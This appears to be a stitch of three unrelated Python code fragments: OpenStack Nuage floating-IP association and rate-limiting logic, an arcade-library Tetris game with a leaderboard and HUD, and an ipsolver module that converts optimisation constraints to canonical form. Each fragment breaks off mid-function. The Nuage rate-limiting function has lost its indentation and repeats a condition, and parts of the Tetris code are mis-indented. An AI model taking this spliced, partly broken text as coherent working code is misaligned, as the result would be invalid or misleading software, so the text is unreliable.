        n_vport = self.vsdclient.get_vport_assoc_with_fip(nuage_fip_id)
        if n_vport and n_vport['ID'] != nuage_vport['ID']:
            needs_fip_association = True
            old_os_port_id = strip_cms_id(n_vport['externalID'])
            disassoc_params = {
                'nuage_vport_id': n_vport['ID'],
                'nuage_fip_id': None
            }
            self.vsdclient.update_nuage_vm_vport(disassoc_params)
            self.vsdclient.delete_rate_limiting(
                n_vport['ID'], neutron_fip['id'])
            self.fip_rate_log.info('FIP %s (owned by tenant %s) '
                                   'disassociated from port %s' % (
                                       neutron_fip['id'],
                                       neutron_fip['tenant_id'],
                                       old_os_port_id))
            # NOTE(review): the target vport may live in a different L3
            # domain than the fip's router; then the fip must be
            # recreated under that domain -- confirm this branch is
            # meant to nest inside the vport-switch case.
            if (nuage_vport['domainID'] !=
                    ent_rtr_mapping['nuage_router_id']):
                nuage_fip_id = self._move_fip_to_different_domain(
                    context,
                    ent_rtr_mapping,
                    fip_pool,
                    neutron_fip,
                    nuage_vport['domainID'])
            else:
                nuage_fip_id = fip['nuage_fip_id']
    if nuage_vport and needs_fip_association:
        params = {
            'nuage_vport_id': nuage_vport['ID'],
            'nuage_fip_id': nuage_fip_id
        }
        self.vsdclient.update_nuage_vm_vport(params)
        self.fip_rate_log.info(
            'FIP %s (owned by tenant %s) associated to port %s'
            % (neutron_fip['id'], neutron_fip['tenant_id'], port_id))
    # Check if we have to associate a FIP to a VIP
    self._process_fip_to_vip(context, port_id, nuage_fip_id)
    if rate_update:
        self._process_fip_rate_limiting(neutron_fip, nuage_vport)
def _move_fip_to_different_domain(self, context, ent_rtr_mapping, fip_pool,
                                  neutron_fip, new_domain_id):
    """Recreate the VSD floating ip under a different L3 domain.

    Deletes the existing VSD fip (bound to the old router's domain) and
    creates a fresh one in the fip pool of ``new_domain_id``.

    :returns: the id of the newly created VSD floating ip
    """
    # Drop the fip from its current domain first.
    delete_params = {
        'fip_id': neutron_fip['id'],
        'fip_last_known_rtr_id': ent_rtr_mapping['router_id']
    }
    self._delete_nuage_fip(context, delete_params)
    LOG.debug("Floating ip on VSD is deleted for fip %s",
              neutron_fip['id'])
    # Recreate it under the target domain.
    create_params = {
        'nuage_rtr_id': new_domain_id,
        'nuage_fippool_id': fip_pool['nuage_fip_pool_id'],
        'neutron_fip_ip': neutron_fip['floating_ip_address'],
        'neutron_fip_id': neutron_fip['id']
    }
    return self.vsdclient.create_nuage_floatingip(create_params)
def _validate_processing_fip(self, context, last_known_router_id,
                             neutron_fip, port_id, vport_id, vport_type):
    """Resolve and validate everything needed to process a floating ip.

    :returns: tuple (ent_rtr_mapping, fip_pool, nuage_vport) where
        nuage_vport is None when no port is involved
    :raises n_exc.BadRequest: when the shared resource or the router's
        net-partition mapping cannot be found
    """
    rtr_id = (last_known_router_id if last_known_router_id
              else neutron_fip['router_id'])
    net_id = neutron_fip['floating_network_id']
    subn = nuagedb.get_ipalloc_for_fip(context.session,
                                       net_id,
                                       neutron_fip['floating_ip_address'])
    subnet_mapping = nuagedb.get_subnet_l2dom_by_id(context.session,
                                                    subn['subnet_id'])
    fip_pool = self.vsdclient.get_nuage_fip_pool_by_id(
        subnet_mapping['nuage_subnet_id'])
    if not fip_pool:
        msg = _('sharedresource %s not found on VSD') % subn['subnet_id']
        raise n_exc.BadRequest(resource='floatingip',
                               msg=msg)
    ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(context.session,
                                                           rtr_id)
    if not ent_rtr_mapping:
        msg = _('router %s is not associated with '
                'any net-partition') % rtr_id
        raise n_exc.BadRequest(resource='floatingip',
                               msg=msg)
    nuage_vport = None
    if port_id:
        port_details = self.core_plugin._get_port(context, port_id)
        # Whether the lookup must fail when no vport exists depends on
        # the port's device owner.
        vport_required = self.needs_vport_for_fip_association(
            port_details.get('device_owner'))
        nuage_vport = self._get_vport_for_fip(context, port_id,
                                              vport_type=vport_type,
                                              vport_id=vport_id,
                                              required=vport_required)
    return ent_rtr_mapping, fip_pool, nuage_vport
def _process_fip_rate_limiting(self, neutron_fip, nuage_vport):
# Add QOS to port for rate limiting
nuage_fip_rate = neutron_fip.get('nuage_fip_rate_values')
nuage_fip_rate_configured = nuage_fip_rate.pop('cli_configured', None)
if nuage_fip_rate_configured and not nuage_vport:
msg = _('Rate limiting requires the floating ip to be '
'associated to a port.')
raise nuage_exc.NuageBadRequest(msg=msg)
if nuage_fip_rate_configured and not nuage_vport:
del neutron_fip['nuage_fip_rate_values']
if | |
", rx_xposn-(rx_width/2)+20, h_5b, arcade.color.BLACK, float(20), bold = True, align="left")
arcade.draw_text("Speed = (# of Levels) - Current Level + GAME_SPEED_FLOOR", rx_xposn-(rx_width/2)+20, h_5b-25, arcade.color.GRAY, float(15), bold = True, align="left")
if self.GAME_SPEED is not None:
t_5b = f"{self.GAME_SPEED} frames"
arcade.draw_text(t_5b, rx_xposn-(rx_width/2)+200, h_5b, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
# Frame Counter
h_1 = rx_yposn+(rx_height/2)-175
arcade.draw_text("Frame Counter: ", rx_xposn-(rx_width/2)+20, h_1, arcade.color.BLACK, float(20), bold = True, align="left")
arcade.draw_text(str(self.frame_count), rx_xposn-(rx_width/2)+200, h_1, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
# FPS
h_3 = rx_yposn+(rx_height/2)-200
arcade.draw_text("FPS: ", rx_xposn-(rx_width/2)+20, h_3, arcade.color.BLACK, float(20), bold = True, align="left")
if self.fps is not None:
t_4a = f"{self.fps:.2f}"
arcade.draw_text(t_4a, rx_xposn-(rx_width/2)+200, h_3, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
h_4 = rx_yposn+(rx_height/2)-225
arcade.draw_text("Time To Update: ", rx_xposn-(rx_width/2)+20, h_4, arcade.color.BLACK, float(20), bold = True, align="left")
if self.processing_time is not None:
t_4b = f"{self.processing_time:.8f} seconds"
arcade.draw_text(t_4b, rx_xposn-(rx_width/2)+200, h_4, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
# Levels
h_2 = rx_yposn+(rx_height/2)-275
t_2a = str(self.GAME_LEVEL_FRAMES[0:5])
t_2b = str(self.GAME_LEVEL_FRAMES[6:])
arcade.draw_text("Level Advance: ", rx_xposn-(rx_width/2)+20, h_2, arcade.color.BLACK, float(20), bold = True, align="left")
arcade.draw_text(t_2a, rx_xposn-(rx_width/2)+200, h_2, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
arcade.draw_text(t_2b, rx_xposn-(rx_width/2)+200, h_2-30, arcade.color.BRIGHT_NAVY_BLUE, float(20), bold = True, align="left")
def draw_grid(self, grid, offset_x, offset_y):
    """Draw the falling-stone grid (the board itself is drawn by the sprite list)."""
    # Paint every occupied cell of the grid at its board position.
    for row_idx, row in enumerate(grid):
        for col_idx, cell in enumerate(row):
            if cell:
                cell_color = colors[cell]
                # Pixel position of the cell center.
                x = (MARGIN + WIDTH) * (col_idx + offset_x) + SCREEN_MARGIN + WIDTH // 2 + WINDOW_MARGIN  # MAY NEED FIXED WITH NEW SCREEN SIZE
                y = TETRIS_HEIGHT - HIDE_BOTTOM - (MARGIN + HEIGHT) * (row_idx + offset_y) + SCREEN_MARGIN + HEIGHT // 2  # MAY NEED FIXED WITH NEW SCREEN SIZE
                arcade.draw_rectangle_filled(x, y, WIDTH, HEIGHT, cell_color)
    # Advertisement Note
    arcade.draw_rectangle_filled(WINDOW_WIDTH / 2, 72, SCREEN_WIDTH, HEIGHT, arcade.color.BLACK)
    arcade.draw_text("REGISTER TODAY @ HACK.OSU.EDU/2021", WINDOW_WIDTH / 2, 78, arcade.color.WHITE, float(9), bold=True, align="center", anchor_x="center", anchor_y="center")
def on_draw(self):
    """Render the screen: background, HUD, board, falling stone, game-over overlay.

    Also records the final score on the leaderboard exactly once when
    the game ends.
    """
    # FPS statistic: recompute the average every fps_calc_freq frames.
    # (Removed an unused start_time timer; processing_time is measured
    # in update(), not here.)
    fps_calc_freq = 60
    if self.frame_count % fps_calc_freq == 0:
        if self.fps_start_timer is not None:
            t_total = timeit.default_timer() - self.fps_start_timer
            self.fps = fps_calc_freq / t_total
        self.fps_start_timer = timeit.default_timer()  # restart timer
    # This command has to happen before we start drawing
    arcade.start_render()
    self.draw_background()
    self.build_mscb()
    self.draw_next_stone()
    self.write_name()
    self.game_diagnostics()
    self.board_sprite_list.draw()
    self.draw_grid(self.stone, self.stone_x, self.stone_y)
    # Record the score exactly once when the game ends (idiomatic
    # truthiness instead of '== True' / '== False').
    if self.game_over and not self.addedScore:
        ALL_SCORES.append([self.score, self.player_name, self.level])  # add player to leaderboard
        self.addedScore = True
        ALL_SCORES.sort(reverse=True)
        saveScores(ALL_SCORES)
        print("Added score & Sorted Scoreboard")
        print(ALL_SCORES)
    if self.game_over:
        self.game_over_cover()
def game_over_cover(self):
    """Dim the play field and show the game-over art with the final name and score."""
    time.sleep(.2)
    # Translucent black overlay across the play area.
    arcade.draw_rectangle_filled(WINDOW_WIDTH / 2, SCREEN_HEIGHT / 2, SCREEN_WIDTH, SCREEN_HEIGHT, (0, 0, 0, 200))
    gameover_texture = arcade.load_texture(GAME_OVER)
    arcade.draw_texture_rectangle(center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT * 5 / 6,
                                  width=SCREEN_WIDTH * 0.7, height=SCREEN_WIDTH * 0.4, texture=gameover_texture)
    # player and score
    final_name = self.player_name
    final_score = str(self.score)
    arcade.draw_text("CHALLENGER", WINDOW_WIDTH / 2, SCREEN_HEIGHT * 7 / 12, arcade.color.WHITE, 30, bold=True, align="center", anchor_x="center", anchor_y="center")
    arcade.draw_text(final_name, WINDOW_WIDTH / 2, SCREEN_HEIGHT * 7 / 12 - 80, arcade.color.WHITE, 40, bold=True, align="center", anchor_x="center")
    arcade.draw_text("SCORE", WINDOW_WIDTH / 2, SCREEN_HEIGHT * 5 / 12, arcade.color.WHITE, 30, bold=True, align="center", anchor_x="center", anchor_y="center")
    arcade.draw_text(final_score, WINDOW_WIDTH / 2, SCREEN_HEIGHT * 5 / 12 - 60, arcade.color.WHITE, 40, bold=True, align="center", anchor_x="center", anchor_y="center")
def switch_to_leaderboard(self):
    """Pause briefly, then hand control to the leaderboard view."""
    time.sleep(3)
    leaderboard = LBView()
    leaderboard.setup(self.score, self.player_name)
    self.window.show_view(leaderboard)
def write_name(self):
    """Draw the current challenger's name banner above the play field."""
    # (Docstring fixed: this draws the player name, not the mini score board.)
    player_name = f"{self.player_name}"
    arcade.draw_text("- CURRENT CHALLENGER -", SCREEN_WIDTH/2 + WINDOW_MARGIN, SCREEN_HEIGHT*0.9, arcade.color.BLACK, float(SCREEN_HEIGHT*0.021), align="center", anchor_x="center", anchor_y="center")
    arcade.draw_text(player_name, SCREEN_WIDTH/2 + WINDOW_MARGIN, SCREEN_HEIGHT*0.87, arcade.color.BLACK, float(SCREEN_HEIGHT*0.02), bold=True, width=340, align="center", anchor_x="center", anchor_y="center")
def build_mscb(self):
    """Draw the mini score board (score + level) and the next-stone box outline."""
    current_score = f"{self.score}"
    current_level = f"{self.level}"
    outline_color = [0, 153, 153]
    arcade.draw_rectangle_outline(e_mscb_xposn, e_mscb_yposn, e_mscb_width, e_mscb_height, outline_color, 2)
    arcade.draw_text("SCORE", e_mscb_xposn - 65, e_mscb_yposn - e_mscb_height * 0, arcade.color.BLACK, float(SCREEN_HEIGHT * 0.013), bold=True, align="left", anchor_y="center")
    arcade.draw_text(current_score, e_mscb_xposn - 50, e_mscb_yposn - e_mscb_height * 0.3, arcade.color.BLACK, float(SCREEN_HEIGHT * 0.030), bold=True, align="left", anchor_y="center")
    arcade.draw_text("LEVEL", e_mscb_xposn - 65, e_mscb_yposn + e_mscb_height * 0.4, arcade.color.BLACK, float(SCREEN_HEIGHT * 0.013), bold=True, align="left", anchor_y="center")
    arcade.draw_text(current_level, e_mscb_xposn + 0, e_mscb_yposn + e_mscb_height * 0.2, arcade.color.BLACK, float(SCREEN_HEIGHT * 0.030), bold=True, align="left", anchor_y="center")
    arcade.draw_rectangle_outline(next_xposn, next_yposn, next_width, next_height, outline_color, 2)
#-- Game Logic
def update(self, dt):
    """ Update, drop stone if warrented. Called by Arcade Class every 1/60 sec"""
    # RX & Statistics (start timer)
    start_time = timeit.default_timer()
    #------------------------------------ FRAME RATE CONTROL
    self.frame_count += 1
    if self.game_over == True:
        self.switch_to_leaderboard()
    # Gravity: drop the stone once every GAME_SPEED frames.
    if self.frame_count % self.GAME_SPEED == 0:
        # NOTE(review): when the joystick is held down this drops twice
        # in the same frame (soft-drop speedup?) -- confirm intended.
        if self.joystick and (self.joystick.y > 0.6): self.drop() # DOWN (vertical is flipped on input)
        self.drop()
    #- Update Game Speed
    self.level_up()
    #- JOYSTICK
    # if self.joystick and (self.frame_count % 3 == 0):
    #     """JoyStick Control Input"""
    #     if self.joystick.x < -0.6: self.move(-1) # LEFT
    #     if self.joystick.x > 0.6: self.move(1) # RIGHT
    #     if self.joystick.y < -0.6: self.hard_drop() # UP
    #- KEYBOARD
    # Held-key auto-repeat: re-trigger every 3rd frame, after a
    # 10-frame initial delay (the *_pressed fields store the frame
    # number at which the key went down, or False when released).
    if self.frame_count % 3 == 0:
        if self.down_pressed and self.frame_count - self.down_pressed > 10:
            self.drop()
        if not self.right_pressed and self.left_pressed and self.frame_count - self.left_pressed > 10:
            self.move(-1)
        elif not self.left_pressed and self.right_pressed and self.frame_count - self.right_pressed > 10:
            self.move(1)
    # RX & Statistics (stop timer)
    self.processing_time = timeit.default_timer() - start_time
def level_up(self):
    """Raise the level (and the game speed) once the frame counter passes a threshold."""
    n_levels = len(self.GAME_LEVEL_FRAMES)
    # Scan thresholds from highest to lowest and stop at the first one
    # already passed; a higher level means fewer frames per drop.
    for lvl in range(n_levels - 1, -1, -1):
        if self.GAME_LEVEL_FRAMES[lvl] < self.frame_count:
            self.level = lvl
            self.GAME_SPEED = n_levels - lvl + GAME_SPEED_FLOOR
            break
def update_board(self):
    """Sync the board sprite textures with the contents of the 2-D grid."""
    for row_idx, row in enumerate(self.board):
        for col_idx in range(len(self.board[0])):
            # Sprites are stored row-major in the flat sprite list.
            sprite_index = row_idx * COLUMN_COUNT + col_idx
            self.board_sprite_list[sprite_index].set_texture(row[col_idx])
def on_key_press(self, key, modifiers):
    """
    Handle user key presses.

    LEFT/RIGHT move the stone, UP rotates, DOWN (or E) soft-drops,
    SPACE (or Q) hard-drops.
    F1 = MENU, F2/F5 = LeaderBoard, F3 = New player,
    PAGEUP/PAGEDOWN = raise/lower the global speed floor.
    """
    global GAME_SPEED_FLOOR
    # GAME Play Commands
    if key == arcade.key.LEFT:
        self.left_pressed = self.frame_count
        self.move(-1)
    elif key == arcade.key.RIGHT:
        self.right_pressed = self.frame_count
        self.move(1)
    elif key == arcade.key.UP:
        self.rotate_stone()
    elif key == arcade.key.DOWN or key == arcade.key.E:
        self.down_pressed = self.frame_count
        self.drop()
    elif key == arcade.key.SPACE or key == arcade.key.Q:
        self.hard_drop()
    # GAME Central Commands
    # (raw key codes 65470/65471/65474/65472/65365/65366 replaced with
    # the named arcade.key constants they correspond to)
    elif key == arcade.key.F1:
        print("---- MAIN MENU")
        next_view = MenuView()
        self.window.show_view(next_view)
    elif key == arcade.key.F2 or key == arcade.key.F5:
        print("---- LEADER BOARD")
        next_view = LBView()
        next_view.setup()
        self.window.show_view(next_view)
    elif key == arcade.key.F3:
        print("---- NEW PLAYER")
        next_view = PNameView()
        next_view.setup()
        self.window.show_view(next_view)
    elif key == arcade.key.PAGEUP:
        GAME_SPEED_FLOOR += 1
        print("---- GAME_SPEED_FLOOR = " + str(GAME_SPEED_FLOOR))
    elif key == arcade.key.PAGEDOWN:
        if GAME_SPEED_FLOOR > 0:
            GAME_SPEED_FLOOR -= 1
        print("---- GAME_SPEED_FLOOR = " + str(GAME_SPEED_FLOOR))
def on_key_release(self, key, modifiers):
    """
    Handle key releases: clear the held-key markers so the auto-repeat
    logic in update() stops moving/dropping the stone.
    """
    # (Docstring fixed: the F1/F2/F3 notes copied from on_key_press did
    # not apply here -- releases only clear the *_pressed fields.)
    # GAME Play Commands
    if key == arcade.key.LEFT:
        self.left_pressed = False
    elif key == arcade.key.RIGHT:
        self.right_pressed = False
    elif key == arcade.key.DOWN:
        self.down_pressed = False
#===============================================================================
class MenuView(arcade.View):
    """Main menu: draws the background and button art, routes function keys to views."""

    def on_show(self):
        arcade.set_background_color([187, 0, 0])  # Set Background. Required. Do not delete def!

    def on_draw(self):
        arcade.start_render()
        # BACKGROUND
        self.background = arcade.load_texture(BACKGROUNDS[1])
        arcade.draw_texture_rectangle(center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2,
                                      width=SCREEN_WIDTH, height=SCREEN_HEIGHT,
                                      texture=self.background)
        # BUTTON GRAPHICS :D
        # Buttons are not intended to be clickable
        button = arcade.load_texture(BUTTONS[0])
        arcade.draw_texture_rectangle(center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2 + TOWER_BUFFER,
                                      width=SCREEN_WIDTH * 0.58, height=SCREEN_HEIGHT * 0.04, texture=button)
        button = arcade.load_texture(BUTTONS[1])
        arcade.draw_texture_rectangle(center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2 - (SCREEN_HEIGHT * 0.05) + TOWER_BUFFER,
                                      width=SCREEN_WIDTH * 0.58, height=SCREEN_HEIGHT * 0.04, texture=button)
        button = arcade.load_texture(BUTTONS[2])
        arcade.draw_texture_rectangle(center_x=WINDOW_WIDTH // 2, center_y=SCREEN_HEIGHT // 2 - (SCREEN_HEIGHT * 0.1) + TOWER_BUFFER,
                                      width=SCREEN_WIDTH * 0.58, height=SCREEN_HEIGHT * 0.04, texture=button)
        # (dead commented-out draw_text button code removed)

    def on_mouse_press(self, x, y, button, modifiers):
        print("Clicking doesn't do anything")

    def on_key_press(self, key, modifiers):
        # Raw key codes replaced with named constants: F1 reloads the
        # menu, F2/F5 opens the leaderboard, F3 starts a new player,
        # ESC quits.
        if key == arcade.key.F1:
            print("---- RELOAD MAIN MENU")
            next_view = MenuView()
            self.window.show_view(next_view)
        if key == arcade.key.F2 or key == arcade.key.F5:
            print("---- LEADER BOARD")
            next_view = LBView()
            next_view.setup()
            self.window.show_view(next_view)
        if key == arcade.key.F3:
            print("---- NEW PLAYER")
            next_view = PNameView()
            next_view.setup()
            self.window.show_view(next_view)
        if key == arcade.key.ESCAPE:
            arcade.close_window()
#===============================================================================
class LBView(arcade.View):
def on_show(self):
    # Set Background. Required. Do not delete def!
    # Called by arcade whenever this view becomes active.
    arcade.set_background_color([187,0,0])
def | |
# ipsolver/_canonical_constraint.py
from __future__ import division, print_function, absolute_import
import numpy as np
import scipy.sparse as spc
from ._constraints import (NonlinearConstraint,
LinearConstraint,
BoxConstraint)
__all__ = ['CanonicalConstraint',
'to_canonical',
'lagrangian_hessian',
'empty_canonical_constraint']
class CanonicalConstraint:
    """Constraint in canonical form.

    Represents the system::

        c_ineq <= 0
        c_eq = 0

    where ``c_ineq, c_eq = constr(x)``.
    """

    def __init__(self, n_vars, n_ineq, n_eq,
                 constr, jac, hess, sparse_jacobian,
                 enforce_feasibility,
                 x0, c_ineq0, c_eq0, J_ineq0, J_eq0):
        # Problem dimensions.
        self.n_vars, self.n_ineq, self.n_eq = n_vars, n_ineq, n_eq
        # Callables evaluating the constraints and their derivatives.
        self.constr, self.jac, self.hess = constr, jac, hess
        # Whether ``jac`` returns sparse matrices.
        self.sparse_jacobian = sparse_jacobian
        # Per-inequality feasibility flags.  Always a list of booleans
        # here (never the single-boolean shorthand allowed by Box,
        # Linear and Nonlinear constraints).
        self.enforce_feasibility = enforce_feasibility
        # Values at the initial point x0.
        self.x0 = x0
        self.c_ineq0, self.c_eq0 = c_ineq0, c_eq0
        self.J_ineq0, self.J_eq0 = J_ineq0, J_eq0
def to_canonical(constraints):
    """Convert constraints or list of constraints to canonical format.

    Parameters
    ----------
    constraints : constraint or sequence of constraints
        A single NonlinearConstraint, LinearConstraint, BoxConstraint or
        CanonicalConstraint, or a list/tuple/ndarray of them.

    Returns
    -------
    CanonicalConstraint
        A single canonical constraint (concatenation when several are
        given).

    Raises
    ------
    ValueError
        On an unknown constraint type or an empty sequence.
    """
    # Put ``constraints`` in list format when needed
    if isinstance(constraints, (NonlinearConstraint,
                                LinearConstraint,
                                BoxConstraint,
                                CanonicalConstraint)):
        constraints = [constraints]
    # BUG FIX: ``np.array`` is a function, not a type; passing it to
    # isinstance raised TypeError for ndarray inputs.  Use np.ndarray.
    if isinstance(constraints, (list, tuple, np.ndarray)):
        # Converts all constraints to canonical format
        constraints_list = []
        for c in constraints:
            if isinstance(c, CanonicalConstraint):
                constraints_list += [c]
            elif isinstance(c, NonlinearConstraint):
                constraints_list += [_nonlinear_to_canonical(c)]
            elif isinstance(c, LinearConstraint):
                constraints_list += [_linear_to_canonical(c)]
            elif isinstance(c, BoxConstraint):
                constraints_list += [_box_to_canonical(c)]
            else:
                raise ValueError("Unknown Constraint type.")
        # Concatenate constraints
        if len(constraints_list) == 0:
            raise ValueError("Empty list.")
        elif len(constraints_list) == 1:
            constr = constraints_list[0]
        else:
            constr = _concatenate_canonical_constraints(constraints_list)
    else:
        raise ValueError("Unknown Constraint type.")
    return constr
def evaluated_to_canonical(constraints, list_c, list_J,
                           n_vars, n_eq, n_ineq, sparse_jacobian):
    """Build concatenated canonical values/Jacobians from pre-evaluated data.

    ``list_c``/``list_J`` hold the raw constraint values and Jacobians
    of each constraint in ``constraints``; each is converted according
    to its ``kind`` and the results are concatenated.
    """
    converted_c = []
    converted_J = []
    for constr, c, J in zip(constraints, list_c, list_J):
        eq, ineq, val_eq, val_ineq, sign, fun_len \
            = _parse_constraint(constr.kind)
        converted_c += [_convert_constr(c, n_vars, n_eq, n_ineq,
                                        eq, ineq, val_eq, val_ineq,
                                        sign)]
        # Per-constraint Jacobian format may differ from the requested
        # output format.
        if constr.sparse_jacobian:
            converted_J += [_convert_sparse_jac(J, n_vars, n_eq, n_ineq,
                                                eq, ineq, val_eq, val_ineq,
                                                sign)]
        else:
            converted_J += [_convert_dense_jac(J, n_vars, n_eq, n_ineq,
                                               eq, ineq, val_eq, val_ineq,
                                               sign)]
    # The constraint values concatenate the same way in both cases.
    c_ineq, c_eq = _concatenate_constr(converted_c)
    if sparse_jacobian:
        J_ineq, J_eq = _concatenate_sparse_jac(converted_J)
    else:
        J_ineq, J_eq = _concatenate_dense_jac(converted_J)
    return c_ineq, c_eq, J_ineq, J_eq
def lagrangian_hessian(constraint, hess):
    """Generate the Lagrangian Hessian as a LinearOperator factory.

    Returns a callable ``lagr_hess(x, v_eq, v_ineq)`` producing a
    LinearOperator for the sum of the objective Hessian ``hess(x)`` and
    the constraint Hessian ``constraint.hess(x, v_eq, v_ineq)`` (each
    term is skipped when None).
    """
    def lagr_hess(x, v_eq=np.empty(0), v_ineq=np.empty(0)):
        n = len(x)
        terms = []
        if hess is not None:
            terms.append(hess(x))
        if constraint.hess is not None:
            terms.append(constraint.hess(x, v_eq, v_ineq))

        def matvec(p):
            out = np.zeros_like(p)
            for term in terms:
                out = out + term.dot(p)
            return out

        return spc.linalg.LinearOperator((n, n), matvec)
    return lagr_hess
def empty_canonical_constraint(x0, n_vars, sparse_jacobian=None):
    """Return an empty CanonicalConstraint (no equalities or inequalities).

    Parameters
    ----------
    x0 : array_like
        Initial point.
    n_vars : int
        Number of variables (Jacobian column count).
    sparse_jacobian : bool or None, optional
        Jacobian format; ``None`` (default) behaves as sparse.
    """
    n_eq = 0
    n_ineq = 0
    empty_c = np.empty(0)
    # Resolve the tri-state flag once so the Jacobian format and the
    # stored ``sparse_jacobian`` attribute cannot disagree.
    use_sparse = sparse_jacobian or (sparse_jacobian is None)
    if use_sparse:
        empty_J = spc.csr_matrix(np.empty((0, n_vars)))
    else:
        empty_J = np.empty((0, n_vars))

    def constr(x):
        return empty_c, empty_c

    def jac(x):
        return empty_J, empty_J

    enforce_feasibility = np.empty(0, dtype=bool)
    # BUG FIX: previously ``True`` was always passed for
    # ``sparse_jacobian`` even when dense (ndarray) Jacobians were built
    # above, leaving the flag inconsistent with the actual format.
    return CanonicalConstraint(n_vars, n_ineq, n_eq,
                               constr, jac, None,
                               use_sparse, enforce_feasibility,
                               x0, empty_c, empty_c,
                               empty_J, empty_J)
# ************************************************************ #
# ********** Auxiliar Functions ********** #
# ************************************************************ #
def _nonlinear_to_canonical(nonlinear):
    """Convert a NonlinearConstraint into a CanonicalConstraint.

    Splits the constraint components into equalities and signed
    inequalities according to ``nonlinear.kind`` and wraps the
    evaluation, Jacobian and Hessian callables accordingly.
    """
    # Parse constraints
    eq, ineq, val_eq, val_ineq, sign, fun_len \
        = _parse_constraint(nonlinear.kind)
    # Get dimensions
    n_eq = len(eq)
    n_ineq = len(ineq)
    n_vars = nonlinear.n

    def new_constr(x):
        # Split raw constraint values into (c_ineq, c_eq).
        c = nonlinear.fun(x)
        return _convert_constr(c, n_vars, n_eq, n_ineq,
                               eq, ineq, val_eq, val_ineq,
                               sign)
    c_ineq0, c_eq0 = _convert_constr(nonlinear.f0, n_vars, n_eq, n_ineq,
                                     eq, ineq, val_eq, val_ineq,
                                     sign)
    # Wrap the Jacobian in the matching (sparse/dense) converter.
    if nonlinear.sparse_jacobian:
        def new_jac(x):
            J = nonlinear.jac(x)
            return _convert_sparse_jac(J, n_vars, n_eq, n_ineq,
                                       eq, ineq, val_eq, val_ineq,
                                       sign)
        J_ineq0, J_eq0 = _convert_sparse_jac(nonlinear.J0, n_vars, n_eq,
                                             n_ineq, eq, ineq, val_eq,
                                             val_ineq, sign)
    else:
        def new_jac(x):
            J = nonlinear.jac(x)
            return _convert_dense_jac(J, n_vars, n_eq, n_ineq,
                                      eq, ineq, val_eq, val_ineq,
                                      sign)
        J_ineq0, J_eq0 = _convert_dense_jac(nonlinear.J0, n_vars, n_eq,
                                            n_ineq, eq, ineq, val_eq,
                                            val_ineq, sign)
    if nonlinear.hess is None:
        new_hess = None
    else:
        def new_hess(x, v_eq=np.empty(0), v_ineq=np.empty(0)):
            # Map canonical multipliers back onto the original
            # components, flipping signs for lower-bound inequalities.
            hess = nonlinear.hess
            v = np.zeros(fun_len)
            if len(v_eq) > 0:
                v[eq] += v_eq
            if len(v_ineq) > 0:
                v[ineq[sign == 1]] += v_ineq[sign == 1]
                v[ineq[sign == -1]] -= v_ineq[sign == -1]
            return hess(x, v)
    if n_ineq == 0:
        enforce_feasibility = np.empty(0, dtype=bool)
    else:
        # Keep only the flags of components that became inequalities.
        enforce_feasibility = nonlinear.enforce_feasibility[ineq]
    return CanonicalConstraint(n_vars, n_ineq, n_eq,
                               new_constr, new_jac, new_hess,
                               nonlinear.sparse_jacobian,
                               enforce_feasibility, nonlinear.x0,
                               c_ineq0, c_eq0, J_ineq0, J_eq0)
def _linear_to_canonical(linear):
    """Convert a LinearConstraint to canonical form via its nonlinear view."""
    return _nonlinear_to_canonical(linear.to_nonlinear())
def _box_to_canonical(box):
    """Convert a BoxConstraint to canonical form via its linear view."""
    return _linear_to_canonical(box.to_linear())
def _convert_constr(c, n_vars, n_eq, n_ineq,
                    eq, ineq, val_eq, val_ineq,
                    sign):
    """Split raw constraint values ``c`` into canonical (c_ineq, c_eq)."""
    no_constr = np.empty((0,))
    # Equalities: shift by the right-hand side.
    if n_eq > 0:
        c_eq = c[eq] - val_eq
    else:
        c_eq = no_constr
    # Inequalities: shift and orient so that feasible means <= 0.
    if n_ineq > 0:
        c_ineq = sign * (c[ineq] - val_ineq)
    else:
        c_ineq = no_constr
    return c_ineq, c_eq
def _convert_sparse_jac(J, n_vars, n_eq, n_ineq,
                        eq, ineq, val_eq, val_ineq,
                        sign):
    """Split a sparse Jacobian into canonical (J_ineq, J_eq) matrices."""
    no_rows = spc.csr_matrix(np.empty((0, n_vars)))
    J_eq = J[eq, :] if n_eq > 0 else no_rows
    if n_ineq == 0:
        return no_rows, J_eq
    # Scale the inequality rows by their orientation sign using a
    # diagonal matrix product.
    scaling = spc.lil_matrix((n_ineq, n_ineq))
    scaling.setdiag(sign)
    J_ineq = scaling * J[ineq, :]
    return J_ineq, J_eq
def _convert_dense_jac(J, n_vars, n_eq, n_ineq,
                       eq, ineq, val_eq, val_ineq,
                       sign):
    """Split a dense Jacobian into canonical (J_ineq, J_eq) matrices."""
    no_rows = np.empty((0, n_vars))
    J_eq = J[eq, :] if n_eq > 0 else no_rows
    if n_ineq == 0:
        return no_rows, J_eq
    # Scale the inequality rows by their orientation sign (broadcast
    # over columns).
    J_ineq = sign[:, np.newaxis] * J[ineq, :]
    return J_ineq, J_eq
def _parse_constraint(kind):
    """Read constraint type and return index lists for the canonical form.

    Parameters
    ----------
    kind : tuple
        Constraint specification, one of:
        ``("interval", lb, ub)`` for ``lb[i] <= f[i] <= ub[i]``;
        ``("greater", lb)`` for ``f[i] >= lb[i]``;
        ``("less", ub)`` for ``f[i] <= ub[i]``;
        ``("equals", c)`` for ``f[i] == c[i]``;
        where ``lb``, ``ub`` and ``c`` are (m,) ndarrays.

    Returns
    -------
    eq : array_like
        Indices of equality constraints.
    ineq : array_like
        Indices of inequality constraints.
    val_eq : array_like
        Equality right-hand side: ``f[eq[i]] = val_eq[i]``.
    val_ineq : array_like
        Inequality right-hand side:
        ``sign[i]*(f[ineq[i]] - val_ineq[i]) <= 0``.
    sign : array_like
        Orientation of each inequality.
    fun_len : int
        Number of components of the raw constraint function.
    """
    ctype = kind[0]
    if ctype == "equals":
        rhs = np.asarray(kind[1], dtype=float)
        n = len(rhs)
        return (np.arange(n, dtype=int),   # eq
